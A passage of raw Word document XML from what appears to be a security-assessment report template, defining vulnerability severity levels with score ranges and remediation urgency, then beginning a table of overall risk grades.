                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5DE3B225" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability poses an immediate threat to the organization. Successful exploitation may permanently affect the organization. Remediation should be immediately performed. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="4748567B" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="747"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E8D10F4" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14D04127" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="E06666"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14603DDA" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
              <w:t>7-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B318F03" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>The vulnerability poses an urgent threat to the organization, and remediation should be prioritized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="6C32972D" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="795"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D2A9835" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="261DF5D5" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="666CB847" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
              <w:t>4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73E67C11" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Successful exploitation is possible and may result in notable disruption of business functionality. This vulnerability should be remediated when feasible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="54D7A5C4" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="672"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BDE950D" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55090FBA" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="93C47D"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57AD4416" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
              <w:t>1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D19E0F3" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="16F916C3" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="657"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FFF21B9" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29BDA806" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BE3C4B8" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BFEBF2E" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">These findings have no clear threat to the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>organization, but</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> may cause business processes to function differently than desired or reveal sensitive information about the company.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05E358ED" w14:textId="1971F891" w:rsidR="00C775BE" w:rsidRPr="00563257" w:rsidRDefault="00FA5149" w:rsidP="00563257">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_n2vg1pp2wwur" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="115" w:name="_Toc177321912"/>
      <w:bookmarkStart w:id="116" w:name="_Toc178498999"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00563257">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Risk Grades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="43A20811" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00C775BE"/>
    <w:p w14:paraId="68F597A0" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00C775BE"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="92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410"/>
        <w:gridCol w:w="6255"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C775BE" w14:paraId="7BAE471C" w14:textId="77777777" w:rsidTr="00D515A7">
        <w:trPr>
          <w:trHeight w:val="603"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="160139C3" w14:textId="2CDA2DC2" w:rsidR="00C775BE" w:rsidRDefault="00477A52" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4811A4FD" w14:textId="69738062" w:rsidR="00C775BE" w:rsidRDefault="00477A52" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00477A52">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Security Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67F34BC2" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C775BE" w14:paraId="7112B501" w14:textId="77777777" w:rsidTr="00D515A7">
        <w:trPr>
          <w:trHeight w:val="747"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35CF63D4" w14:textId="06A7F1D2" w:rsidR="00C775BE" w:rsidRDefault="00900EE3" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7035976D" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="E06666"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52FF2184" w14:textId="5CBA16B6" w:rsidR="00C775BE" w:rsidRDefault="00900EE3" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
              <w:t>Poor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20B5949B" w14:textId="198C85BE" w:rsidR="00C775BE" w:rsidRDefault="009E6451" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E6451">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Significant security deficiencies. Immediate attention required to address exposures. Major changes needed to meet industry best practice standards.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C775BE" w14:paraId="40983629" w14:textId="77777777" w:rsidTr="00D515A7">
        <w:trPr>
          <w:trHeight w:val="795"/>
          <w:jc w:val="center"/>
